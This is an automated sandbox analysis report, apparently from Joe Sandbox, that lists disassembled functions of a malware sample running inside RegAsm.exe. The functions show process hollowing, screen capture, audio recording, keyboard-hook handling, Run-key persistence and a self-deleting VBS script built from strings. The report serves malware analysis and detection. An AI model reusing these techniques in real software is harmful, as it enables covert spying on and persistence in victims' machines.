                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                  • String ID: lJD
                                                                  • API String ID: 1084509184-3316369744
                                                                  • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                  • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                                  • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                  • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                  • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                  • String ID: lJD
                                                                  • API String ID: 1084509184-3316369744
                                                                  • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                  • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                                  • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                  • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: GetLocaleInfoEx
                                                                  • API String ID: 2299586839-2904428671
                                                                  • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                  • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                                  • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                  • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                  • HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Heap$FreeProcess
                                                                  • String ID:
                                                                  • API String ID: 3859560861-0
                                                                  • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                                                  • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                                                  • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                                                  • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                  • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                  • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                  • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                  • String ID:
                                                                  • API String ID: 1663032902-0
                                                                  • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                  • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                                  • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                  • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                  • String ID:
                                                                  • API String ID: 2692324296-0
                                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                  • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                  • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                                  APIs
                                                                    • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                  • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                  • String ID:
                                                                  • API String ID: 1272433827-0
                                                                  • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                  • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                                  • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                  • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                  • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                  • String ID:
                                                                  • API String ID: 1084509184-0
                                                                  • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                  • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                                  • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                  • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                  APIs
                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                    • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                  • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                  • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                  • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                  • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                  • GetIconInfo.USER32 ref: 00418FBD
                                                                  • DeleteObject.GDI32(?), ref: 00418FEC
                                                                  • DeleteObject.GDI32(?), ref: 00418FF9
                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                  • DeleteDC.GDI32(?), ref: 0041917C
                                                                  • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                  • DeleteObject.GDI32(00000000), ref: 00419182
                                                                  • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                  • DeleteObject.GDI32(00000000), ref: 00419241
                                                                  • GlobalFree.KERNEL32(?), ref: 00419248
                                                                  • DeleteDC.GDI32(?), ref: 00419258
                                                                  • DeleteDC.GDI32(00000000), ref: 00419263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                  • String ID: DISPLAY
                                                                  • API String ID: 479521175-865373369
                                                                  • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                                                  • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                  • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                                                  • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                  • ReadProcessMemory.KERNEL32 ref: 0041826B
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                  • WriteProcessMemory.KERNEL32 ref: 0041840B
                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                  • ResumeThread.KERNEL32(?), ref: 00418435
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                  • GetLastError.KERNEL32 ref: 0041847A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                  • API String ID: 4188446516-3035715614
                                                                  • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                  • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                  • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                  • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                  APIs
                                                                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                  • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                  • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                  • API String ID: 1861856835-332907002
                                                                  • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                                                  • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                  • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                                                  • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                  APIs
                                                                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                  • ExitProcess.KERNEL32 ref: 0040D419
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                  • API String ID: 3797177996-2557013105
                                                                  • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                                                  • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                  • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                                                  • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                  APIs
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                  • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                  • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                  • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                  • API String ID: 2649220323-436679193
                                                                  • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                  • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                  • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                  • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                  APIs
                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                  • SetEvent.KERNEL32 ref: 0041B219
                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                  • CloseHandle.KERNEL32 ref: 0041B23A
                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                  • API String ID: 738084811-2094122233
                                                                  • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                                                  • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                  • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                                                  • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
